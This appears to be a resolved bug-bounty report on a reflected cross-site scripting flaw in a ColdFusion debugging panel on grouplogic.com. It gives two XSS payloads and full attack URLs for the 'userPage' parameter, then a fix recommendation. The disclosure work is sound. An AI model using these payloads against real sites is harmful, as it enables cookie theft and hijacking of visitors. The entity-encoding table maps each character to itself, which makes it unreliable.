Reflected Cross Site Scripting at ColdFusion Debugging Panel http://www.grouplogic.com/CFIDE/debug/cf_debugFr.cfm
Low
A
Acronis
Submitted None
Actions:
Reported by
ub3rsick
Vulnerability Details
Technical details and impact analysis
## Summary
The ColdFusion Debugging Panel exposed at below URL.
```
http://www.grouplogic.com/CFIDE/debug/cf_debugFr.cfm?userPage=
```
The **userPage** parameter is not properly sanitized and is displayed without proper output encoding. This results in reflected cross site scripting.
## Steps To Reproduce
Enter any of below payload in the **userPage** parameter and access the URL:
```
Payload 1: Mouse Over XSS
---------------------------
%0d%0a</script><h1+onmouseover=alert(document.cookie)>MOUSEOVER_XSS</h1>
Payload 2:
---------
%0d%0a</script><img+src=x+onerror=alert(document.domain)>
```
Or Just access below URLs in browser:
```
http://www.grouplogic.com/CFIDE/debug/cf_debugFr.cfm?userPage=%0d%0a</script><h1+onmouseover=alert(document.cookie)>MOUSEOVER_XSS</h1>
http://www.grouplogic.com/CFIDE/debug/cf_debugFr.cfm?userPage=%0d%0a</script><img+src=x+onerror=alert(document.domain)>
```
## Recommendations
It is highly recommended to implement output encoding.
Encode the following characters with HTML entity encoding to prevent switching into any execution context, such as script, style, or event handlers. Using hex entities is recommended in the spec. The 5 characters significant in XML ```(&, <, >, ", ')```:
```
& --> &
< --> <
> --> >
" --> "
' --> '
```
Reference: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html
## Impact
XSS can be used to :
- Steal cookies, password
- Website Defacement
- Redirect Victim to Malicious site
- Log keystrokes etc.
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-site Scripting (XSS) - Reflected